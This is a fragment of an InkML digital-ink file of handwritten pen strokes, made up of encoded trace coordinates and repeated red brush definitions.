  <inkml:trace contextRef="#ctx0" brushRef="#br0">524 1 24575,'0'1533'-877,"-1"-1500"877,-9 46 0,-1 26 0,10 693 0,3-389 0,-2 280-800,-2-649 700,-7 43 0,-2 32 140,10 281-669,2-185 389,-2-184 456,-9 48 0,5-47 16,-1 45 0,6-12-326,0 21-369,-12 97 1,-11 16 1162,11-51-774,2-15-172,2-72 246,-3 11 0,0 78 0,-13 94 0,5-76 0,-32 191-1432,31-202 1420,11-66 182,-42 238 158,48-307-47,-1 0 1,-10 25-1,9-28-296,0 0 0,1 0 0,0 1 0,-1 17 1,-5 43 1566,5-51-1016,-1 47 1,6 556-537,2-602 0,7 48 0,-4-46 0,1 37 0,-5-38-17,-3 230-620,-3-213 637,-17 66 0,7-44 0,-21 104 0,13-73 201,15-71-110,2-1-1,0 1 1,2 0 0,-2 38-1,5-47-90,0 1 0,-7 25 0,-2 30 0,9 386 0,2-224 0,1-197 0,7 44 0,-3-44 0,0 41 0,-6-37 0,2 1 0,8 48 0,-3-40 0,-3 0 0,-4 90 0,-2-56 0,1-54 0,-9 48 0,-2 23 0,11-60 0,1-4 0,-2 0 0,-7 44 0,2-32 0,3 0 0,4 102 0,2-57 0,-1-79 0,1 0 0,6 30 0,-4-29 0,-1 1 0,1 20 0,-3 392 0,-2-208 0,0-220 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,4 0 0,180-1 62,-68-2-1363,1064 3-652,-1009-11 1953,-16 0 0,733 10 2332,-430 3-1472,-430-1-860,0 3 0,58 13 0,-58-10 0,0-1 0,60 3 0,38 1 0,4 1 0,443-12 0,-548 0 0,47-9 0,-46 5 0,44-1 0,601 7-1990,-421 21 1685,-8 0 366,468-22 1190,-319-1-569,-380-1-655,-1 0 0,0-1 1,-1 0-1,1-1 1,0-1-1,-1 0 1,0 0-1,0-1 0,-1-1 1,19-13-1,-24 15-27,0 0 0,0 0 0,0-1 0,-1 0 0,0 0 0,0-1 0,0 0 0,-1 1 0,0-1 0,0-1 0,3-9 0,2-9 0,-1 0 0,4-30 0,8-28 0,52-172 0,-51 112 0,47-112 0,-50 200 0,-14 39 0,0-1 0,1-32 0,4-17 0,34-142 0,-21 91 0,38-185 0,-54 262-200,-1-65 1,-1 21 25,6 11 174,-6 47 0,3-44 0,-7 70 0,0-24 143,0-1 1,2 1-1,8-37 0,-4 27-143,-2-1 0,-2 1 0,-1-1 0,-3-38 0,-1-6 0,3-470 0,2 522 0,7-46 0,-4 44 0,2-36 0,-6-507-1522,-3 275 954,0 263 568,-7-45 0,-2-25 0,10 76 0,1-24 0,-12-71 0,5 49-148,2 0 0,7-94 0,0 46 44,-2-4293 2172,-1 4395-1968,-1 0 0,-6-25 0,4 23 35,-3-37 0,-7-73-135,6 67 0,-16-83 0,8 56 0,11 59-50,-4-21-477,-3-91-1,11 131 528,-1-1 0,-1 1 0,0 0 0,-1 0 0,0 0 0,-8-17 0,4 11 0,-10-43 0,9 27-7,-20-56 1,15 54 86,-8-41 1,-31-113 876,14 61-957,25 83 0,4 16 0,-5-36 0,12 54 0,0 0 0,-1 1 0,-1 0 0,0 0 0,-1 0 0,0 1 0,-9-14 0,-5-12 0,14 27 0,0 0 0,-1 0 0,-15-19 0,-13-17 0,27 36 0,-1 0 0,0 1 0,0-1 0,-22-18 0,2 6 0,20 15 0,0 1 0,-1 0 0,0 1 0,0 0 0,0 0 0,-20-8 0,-317-112 0,155 69 0,79 27 0,-103-34 0,50 22 0,136 36 0,1 2 0,1 2 0,-41-1 0,-15-1 0,-5-11 0,56 9 0,0 2 0,-37-2 0,36 4 0,0 0 0,-46-13 0,49 9 0,-2 1 0,-58-3 0,52 9 0,-1-1 0,-55-10 0,48 4 0,-1 3 0,1 2 0,-91 7 0,5 16 0,86-13 0,9-2 0,-72 3 0,55-6-319,-92 18 0,7-2-46,91-14 232,-233 12-2333,189-13 1956,-129 21 0,194-21 498,-228 21-1706,215-22 1622,-451 51 63,329-38 33,-23 4 0,-223 60 747,383-76-100,14-2 426,0 0 0,-23 8 0,33-9-1051,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,0 1 1,0 0-1,-1 0 0,1-1 1,0 1-1,1 1 0,-1-1 1,0 0-1,1 0 1,-1 1-1,1-1 0,-1 3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0.782"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">285 0 24575,'-4'0'0,"1"1"0,0-1 0,0 1 0,0 0 0,-1-1 0,1 2 0,0-1 0,0 0 0,0 0 0,0 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 1 0,1-1 0,-4 5 0,-4 5 0,1 0 0,-12 24 0,-8 9 0,9-21 0,1 0 0,2 1 0,0 1 0,2 1 0,0 0 0,-11 32 0,19-40 0,2-1 0,0 1 0,0 1 0,2-1 0,1 0 0,-1 38 0,2 51 0,4 111 0,0-201 0,1 0 0,1-1 0,0 1 0,1-1 0,1 0 0,0-1 0,1 0 0,20 29 0,-9-14 0,-6-5 0,-10-20 0,0 0 0,0 0 0,0 0 0,1-1 0,0 1 0,0-1 0,0 0 0,7 6 0,-6-7 0,1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0-1 0,1 0 0,-1 0 0,1 0 0,6 0 0,9 0 0,0-1 0,24-1 0,-27-1 0,0 1 0,0 1 0,25 4 0,0 2 36,1-2-1,80-2 1,-83-3-383,1 1 0,0 2 1,54 12-1,301 61-667,-169-35-327,-177-34 1362,81 2 1,-87-8-229,-1 2 0,73 14 0,-88-10-14,0-1 0,57 3 0,-69-9-3094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7.584"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">25 0 24575,'-1'21'0,"0"0"0,-1 0 0,-7 32 0,5-33 0,1 1 0,1-1 0,0 0 0,2 1 0,0-1 0,2 1 0,0-1 0,1 1 0,2-1 0,-1 0 0,2-1 0,1 1 0,1-1 0,0-1 0,14 24 0,-12-22 0,12 33 0,-19-41 0,1 0 0,1 0 0,0-1 0,1 0 0,0 0 0,0 0 0,1-1 0,1 0 0,14 15 0,-20-22 0,1-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,4-3 0,-2 1 0,0 0 0,-1 0 0,0 0 0,1-1 0,-2 1 0,1-1 0,0 0 0,-1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,-1 1 0,2-10 0,0-30 0,-2-1 0,-7-59 0,1 76 0,-14-51 0,-1-6 0,20 82 2,-1 0 0,0 0 0,0 1 1,-1-1-1,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-6-5 1,-3 0-41,0 0 1,0 0-1,-15-6 1,-10-6-1212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8.226"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'1'0,"1"-1"0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 1 0,6 27 0,-3-14 0,15 49 0,22 130 0,-21-98 0,-13-65 0,0 1 0,-2-1 0,1 48 0,-7-66 0,1-9 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,4 7 0,-5-11 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,-3-25 0,-10-41 0,-4-23 0,15 80 0,2 0 0,-1-1 0,1 1 0,1 0 0,0-1 0,3-13 0,1 11 0,0 1 0,1 0 0,1 0 0,0 0 0,0 1 0,1 0 0,1 0 0,19-18 0,-24 25 0,1 0 0,1 0 0,-1 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,11-3 0,59-8 0,-57 11 0,-1-1 0,0 1 0,1 0 0,-1 1 0,1 2 0,-1 0 0,1 0 0,-1 2 0,34 9 0,-49-11 0,0 1 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,1 6 0,2 7 0,0-1 0,3 21 0,0 3 0,2-11 0,18 35 0,-7-17 0,-9-23 0,0-1 0,2 0 0,16 21 0,12 18 0,-37-51 0,-4-10 0,-5-18 0,-11-73-1365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8.650"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'1'9'0,"0"1"0,1-1 0,0 0 0,0 0 0,1-1 0,7 16 0,9 33 0,-11-22 0,21 55 0,0-3 0,-6-13 0,52 113 0,-63-159 0,92 226 0,-92-220 0,-2 1 0,-1 0 0,-2 0 0,5 66 0,-11-90 0,0 0 0,1-1 0,0 1 0,1 0 0,1-1 0,-1 1 0,1-1 0,8 13 0,7 21 0,-14-29 0,-1 1 0,0-1 0,-2 1 0,2 19 0,5 29 0,-9-62 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,-1-1 0,0 2 0,0-3 0,1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-19-10 0,14 5-227,0 0-1,-1 0 1,1-1-1,1 1 1,-8-12-1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9.037"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'12'2'0,"-1"0"0,0 1 0,0 0 0,0 0 0,0 1 0,-1 1 0,15 7 0,1 1 0,-12-9 0,-1 1 0,1-2 0,-1 0 0,1-1 0,0 0 0,24 0 0,-16-2 0,35 7 0,-18-1 0,1-2 0,1-2 0,45-3 0,56 3 0,-70 8 0,-45-5 0,47 2 0,-39-5 0,38 7 0,-38-4 0,39 1 0,-56-5 27,-1 1 0,1 1-1,-1 0 1,25 10 0,-21-7-777,43 8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1:42.198"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2"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49.660"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">417 240 24575,'0'-7'0,"0"0"0,0 0 0,-1 0 0,0 0 0,0-1 0,-1 1 0,0 0 0,0 1 0,0-1 0,-1 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,-9-8 0,-1-2 0,-1 1 0,-1 1 0,-26-16 0,36 24 0,-1 1 0,0 0 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0 1 0,1-1 0,-1 2 0,-9-1 0,14 2 0,0-1 0,1 1 0,-1 1 0,0-1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-3 5 0,-5 9 0,0 1 0,-10 26 0,16-34 0,-6 18 0,2 0 0,1 1 0,-7 57 0,9-31 0,2 0 0,8 96 0,-5-147 0,0-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,5 0 0,13-2 0,1 0 0,-1-1 0,0-2 0,41-13 0,-52 15 0,42-10 0,-38 10 0,0-1 0,-1 0 0,1-1 0,-1 0 0,20-11 0,-12 2 0,-1 0 0,-1-2 0,-1 0 0,0-1 0,28-33 0,-42 45 0,0 0 0,1 1 0,-1-1 0,1 1 0,6-4 0,-9 7 0,0-1 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,6 0 0,-7 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 3 0,8 28 0,-6-20 0,8 33 0,-8-27 0,2 0 0,0-1 0,1 0 0,1 0 0,9 17 0,19 43 0,-34-76 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,-4 0 0,-105-2-1365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0.047"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'0'4'0,"0"4"0,4 2 0,1 2 0,3-1 0,1 2 0,-2 2 0,-2 2 0,-5-1 0,-6-4 0,-7-4 0,-4-4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0.512"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>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0.862"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'1'0'0,"0"1"0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 2 0,10 26 0,-8-22 0,0 6 0,1 0 0,-2 0 0,0 0 0,0 0 0,-1 0 0,-1 18 0,-1-16 0,2 1 0,0 0 0,6 28 0,-1-15 0,5 48 0,-2-2 0,-3-42 0,20 130 0,-21-133 0,15 53 0,-4-20 0,-12-50 0,0 1 0,12 23 0,-10-27 0,-2 1 0,1 0 0,-2 0 0,4 14 0,-23-54 0,10 3 0,2-1 0,0 1 0,2-1 0,1 1 0,5-49 0,-2 1 0,-1 59 0,1 1 0,0-1 0,1 1 0,0 0 0,1 0 0,1 0 0,0 0 0,1 1 0,13-23 0,-4 12 0,2 0 0,0 1 0,1 1 0,21-20 0,-34 38 0,0 0 0,0 1 0,0-1 0,0 1 0,1 1 0,-1-1 0,1 1 0,10-3 0,-8 2 0,0 1 0,-1-1 0,1-1 0,7-4 0,-9 4 0,1-1 0,1 0 0,-1 0 0,1 1 0,0 0 0,13-4 0,-19 7 0,1 1 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,2 2 0,12 14 0,-11-13 0,0 0 0,1 1 0,-2-1 0,1 1 0,-1 0 0,1 0 0,-2 0 0,5 13 0,-1-2 0,1 1 0,0-2 0,13 22 0,-12-24 0,0 0 0,-2 1 0,1-1 0,-2 1 0,5 18 0,-7-19 0,1-1 0,0 1 0,2-1 0,-1 0 0,14 21 0,-6-10 0,-4-5 0,12 35 0,-15-35 0,1-1 0,13 26 0,-9-26 0,6 12 0,16 36 0,-28-54 0,-1-1 0,-1 1 0,0 0 0,0 0 0,-1 0 0,1 24 0,-4-14-109,2 26 344,-1-46-309,1 0-1,-1 0 1,1 0-1,-1 0 1,1-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,1 1 1,-1-1-1,1 0 1,3 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1.386"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 588 24575,'55'2'0,"-21"0"0,36-4 0,-61 2 0,0-1 0,0-1 0,-1 1 0,1-2 0,-1 1 0,1-1 0,-1 0 0,0-1 0,9-5 0,-8 1 0,-1 0 0,1-1 0,-2 0 0,1 0 0,-1-1 0,0 0 0,-1 0 0,9-22 0,0 3 0,0 3 0,-2-1 0,0 0 0,-2-1 0,-1 0 0,-2-1 0,0 0 0,3-33 0,-10 56 0,-1 0 0,1 1 0,-1-1 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 1 0,-2 0 0,-9-5 0,-5 2 0,1 1 0,-1 0 0,1 2 0,-1 0 0,0 1 0,0 1 0,-40 3 0,57-1 0,1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1-1 0,0 1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,0 1 0,-1 3 0,0 10 0,0-1 0,1 1 0,3 27 0,-1-13 0,1 2 0,6 34 0,-4-37 0,2 48 0,-7-53 0,0 18 0,1 0 0,10 56 0,-3-52 0,19 81 0,-19-106 0,2 0 0,0-1 0,1 0 0,0-1 0,2 0 0,0-1 0,17 17 0,28 42 0,-52-67 0,0-1 0,1 0 0,0 0 0,1 0 0,0-1 0,0 0 0,17 11 0,-20-15 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,0 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,4 11 0,-2-2 0,-1 1 0,0 0 0,3 23 0,-7-36-6,1-1 0,-1 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,-1 0 0,1-1-1,0 1 1,-1 0 0,0 2 0,0-3 15,1-1-1,-1 1 1,1-1 0,0 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1-1,0 0 1,1 0 0,-1 1-1,1-1 1,-1 0 0,0 0 0,0 0-1,0 0 1,-1 0-96,-1 0-1,1-1 1,-1 1 0,1-1-1,0 0 1,0 1 0,-1-1-1,1 0 1,0-1-1,0 1 1,0 0 0,0 0-1,0-1 1,0 1 0,0-1-1,-1-2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1.857"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">45 0 24575,'2'18'0,"1"0"0,0-1 0,1 1 0,1-1 0,14 33 0,10 0 0,-22-40 0,-1 0 0,0 0 0,5 14 0,-8-18 0,39 117 0,-38-107 0,-1 0 0,0 0 0,-1 0 0,-1 0 0,0 0 0,-2 17 0,1-32 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-3 0,-3-5 0,1-1 0,1 0 0,0 1 0,0-1 0,1 0 0,0 0 0,1-20 0,0 25 0,0 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 1 0,2-1 0,-1 1 0,0 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,6-5 0,0 4 0,-7 8 0,-11 13 0,-4-8 0,0 0 0,0-1 0,-1 0 0,0-1 0,-19 6 0,5-1 0,-14 7-1365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2.755"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">4123 1 24575,'-26'1'0,"1"2"0,-1 0 0,-46 14 0,25-6 0,25-6 0,-195 38 0,125-35-571,67-8 295,-1 2-1,1 1 0,-39 10 0,25-4 117,0-2 0,-75 4 0,63-7-9,-52 10-1,-284 42-1628,54-20 1798,67-13-1762,167-17 1372,-549 3-2370,394-11 2099,-396 37 77,570-28 939,-213 30 2202,270-32-1809,11-3 326,1 0 1,-1 0-1,1 2 1,-19 7-1,62-10 346,-24-4-1419,-1-1 0,1 1-1,-1-1 1,0-1 0,0 1 0,0-1-1,-1 0 1,1-1 0,-1 0 0,7-9-1,18-14-1373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54.403"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'3'1'0,"0"0"0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 1 0,-1-1 0,1 0 0,2 4 0,9 6 0,11 3 0,1 0 0,32 12 0,21 11 0,-38-18-93,0-1 0,85 23 0,-59-20-1888,-24-8 986,72 13-1,-47-20 3945,-35-6-2192,-14-1-632,0 0-1,0 2 1,-1 0 0,37 9 0,-51-10-128,0 1 0,0 0 0,1-1 0,-1 1 1,-1 1-1,1-1 0,0 1 0,0-1 0,-1 1 0,0 0 0,1 0 0,-1 1 0,0-1 0,-1 0 0,1 1 0,-1 0 0,1 0 1,-1 0-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,-1 0 0,2 7 0,-1-3 3,-1 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,0 0 0,-1 0 0,0 1 0,0-1 0,-1 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,-1 0 0,0 0 0,-7 8 0,11-14 0,-12 17 0,-1-1 0,0-1 0,-1 0 0,0-1 0,-2 0 0,-21 14 0,-148 94 0,126-79 0,47-32 0,-1-2 0,1 0 0,-29 15 0,25-19 3,1 0 0,-35 6-1,34-8 15,0 0 0,-22 9 0,33-10-146,0 0-1,0 0 1,0 0-1,1 1 1,-1 0-1,1 0 1,0 0-1,0 1 1,1 0-1,-5 5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9.924"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'-1'16'0,"1"0"0,1 0 0,0-1 0,1 1 0,1 0 0,0-1 0,1 1 0,11 26 0,36 72 0,-39-90 0,11 35 0,-4-11 0,-7-15 0,10 45 0,-15-51 0,1 0 0,1-1 0,14 30 0,-15-39 0,-1 1 0,8 33 0,9 22 0,-7-29 0,21 89 0,-4-8 0,-29-106 0,0 0 0,2 30 0,2 11 0,-6-34 0,-5-16 0,-3-19 0,1-8 0,0 0 0,2-1 0,0 1 0,1 0 0,0-1 0,4-25 0,-2 1 0,-1 33 0,1 1 0,0-1 0,0 1 0,1-1 0,0 1 0,0 0 0,1 0 0,0 0 0,1 0 0,0 1 0,0-1 0,9-12 0,3 1 0,1 0 0,38-31 0,-36 33 0,13-19 0,-26 29 0,-1 0 0,1 1 0,0-1 0,1 1 0,-1 1 0,10-6 0,16-10 0,-18 11 0,0 1 0,1 1 0,0 0 0,0 1 0,1 0 0,25-6 0,-10 6 0,-18 3 0,1 1 0,0 0 0,0 1 0,21 0 0,-31 2 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,3 5 0,149 247 0,-143-230 0,15 49 0,1 3 0,-21-60 0,8 35 0,3 11 0,-18-63 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-17-4 0,-33-18 0,28 12 0,-38-10-1365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0.605"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
